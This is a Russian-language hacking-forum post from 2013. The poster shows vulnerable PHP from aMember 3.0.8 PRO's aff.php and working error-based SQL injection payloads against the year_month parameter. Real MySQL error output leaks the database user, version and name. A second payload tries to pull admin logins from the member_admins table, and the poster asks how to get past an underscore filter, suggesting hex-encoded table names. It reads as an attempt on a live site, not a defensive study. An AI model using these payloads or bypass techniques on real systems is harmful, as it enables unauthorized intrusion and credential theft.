Ваши вопросы по уязвимостям.

#11

12.04.2013, 01:52

SaliVan

Новичок

Регистрация: 22.04.2012

Сообщений: 4

С нами: 7398326

Репутация: 0

фильтр таблицы

привет всем !

нужна помощь в обходе фильтра на знак '_'

уязвимый код

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]list([/COLOR][COLOR="#0000BB"]$y[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]split[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'_'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'year_month'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'%02d'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$dat1[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$y[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]-[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]-01"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$dat2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Y-m-t'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strtotime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dat1[/COLOR][COLOR="#007700"]));

...........

[/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT DAYOFMONTH(ac.date), COUNT(commission_id),

        SUM(IF(record_type='debit', amount, 0)), 

        SUM(IF(record_type='credit', amount, 0)),

        SUM(IF(record_type='debit', 1, 0))

        FROM[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]prefix[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]aff_commission ac

        WHERE aff_id=[/COLOR][COLOR="#0000BB"]$member_id[/COLOR][COLOR="#DD0000"]AND ac.date BETWEEN '[/COLOR][COLOR="#0000BB"]$dat1[/COLOR][COLOR="#DD0000"]' AND '[/COLOR][COLOR="#0000BB"]$dat2[/COLOR][COLOR="#DD0000"]'

        GROUP BY DAYOFMONTH(ac.date)

    "[/COLOR][COLOR="#007700"]);

...........

[/COLOR][/COLOR]

запрос который у меня вышел

Цитата:

Сообщение от None

?year_month=2013-01-01' and(select 1 from(select count(*),concat(concat(user(),0x3a,version(),0x3a, database()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- _1&action=stats
в ответ получил
MYSQL ERROR:
Duplicate entry 'support_memuser@localhost:5.5.23-55:support_memb1' for key 'group_key'
in query:
SELECT DAYOFMONTH(ac.date), COUNT(commission_id), SUM(IF(record_type='debit', amount, 0)), SUM(IF(record_type='credit', amount, 0)), SUM(IF(record_type='debit', 1, 0)) FROM amember_aff_commission ac WHERE aff_id=4753 AND ac.date BETWEEN '2013-01-01' AND '1969-12-31' and(select 1 from(select count(*),concat(concat(user(),0x3a,version(),0x3a, database()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- -01-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)

Цитата:

Сообщение от None

?year_month=2013-01-01' and(select 1 from(select count(*),concat((select login from
member_admins
limit 0,1),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- _1&action=stats
ну и в ответ соответственно
MYSQL ERROR:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-00-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)' at line 6
in query:
SELECT DAYOFMONTH(ac.date), COUNT(commission_id), SUM(IF(record_type='debit', amount, 0)), SUM(IF(record_type='credit', amount, 0)), SUM(IF(record_type='debit', 1, 0)) FROM amember_aff_commission ac WHERE aff_id=4753 AND ac.date BETWEEN '2013-01-01' AND '1969-12-31' and(select 1 from(select count(*),concat((select login
from member-00-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)

можно ли каким то образом обойти такой фильтр???

зашифровать?

чтото типа

Код:

SELECT * FROM (SELECT 0x7461626c655f6e616d65) AS t2

да и к стати это уязвимость в aMember 3.0.8 PRO в фаиле aff.php